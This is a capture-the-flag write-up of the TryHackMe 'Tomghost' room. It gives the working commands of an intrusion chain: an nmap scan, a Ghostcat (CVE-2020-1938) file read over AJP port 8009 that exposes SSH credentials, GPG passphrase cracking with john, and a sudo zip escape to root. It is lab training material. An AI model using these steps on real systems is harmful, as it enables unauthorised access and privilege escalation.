Tomghost — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Tomghost — TryHackMe — Writeup. Check it out!
First, deploy the machine and nmap to scan opened ports.
nmap -T4 -p- -A <ip>
Let’s access its website as an Apache is running.
As the room said, there is CVE-2020–1938 vulnerability of this Apache version. So let’s try to search for this CVE on google. Here I found a python script on Github
Download the script and run. Note that the port we are going to attack is 8009, as it’s ajp, not 8080.
python3 tomcat.py <ip> -f /WEB-INF/web.xml -p 8009
I can read the content of web.xml
I found something looks like credential! It’s skyfuck and his password. Let’s try to ssh using that credential.
ssh skyfuck@<ip>
Success!
Now get our first flag.
Let’s see what’s inside skyfuck home folder
Well so I see a credential file and it was encrypted using gpg. There is also a key to decrypt that file: tryhackme.asc
In order to decrypt that file, we need a passphrase. We haven’t known yet, but we can bruteforce using john.
Let’s cat tryhackme.asc and copy the content to a text file.
Execute these 2 commands:
gpg2john tryhackme.asc > gpgjohn.txt
john — wordlist=/path-to-wordlist gpgjohn.txt
Now we have the passphrase: alexandru
Now decrypt the credential.pgp with that passphrase we got the content:
su merlin using that password and now we are merlin
Now sudo -l to see which cmd merlin can run as root
So merlin can run zip cmd as root. Refer to https://gtfobins.github.io/gtfobins/zip/#sudo
Execute this cmd to get root:
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Now i’m root! Get our final flag.
The end.
HAPPY HACKING
